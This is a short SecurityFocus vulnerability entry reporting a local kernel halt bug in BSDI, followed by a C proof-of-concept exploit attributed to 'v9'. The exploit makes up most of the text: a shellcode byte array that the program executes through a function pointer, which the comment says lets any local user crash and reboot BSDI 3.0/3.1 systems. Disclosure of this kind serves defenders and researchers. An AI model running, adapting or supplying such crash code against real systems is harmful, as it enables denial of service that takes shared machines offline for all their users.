source: http://www.securityfocus.com/bid/3220/info
It has been reported that there is a locally exploitable vulnerability in BSDI.
It is allegedly possible for a userland process to cause the kernel to halt.
This may be due to a bad system call.
/* (BSDi)*[v3.0/3.1] system failure, by
v9[[email protected]]. this will result
in the ability of any user to fail the
system, and reboot it. this bug is
similar to that of the "f00f" bug.
results are similar, except this reboots
the machine instead of having a freezing
effect. tested, and built for: BSDi
v3.0/3.1. (arch/non-specific to BSDi)
*/
char bsdi_killcode[] =
"\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b"
"\xb0\x9a\x50\x89\xe7\xff\xd7";
int main() {
void (*execcode)()=(void *)bsdi_killcode;
printf("[ (BSDi)*[v3.0/3.1]: system failu"
"re, by: v9[[email protected]]. ]\n");
printf("*** no output should be seen afte"
"r this point.\n");
execcode();
printf("*** system failure failed.\n");
exit(0);
}
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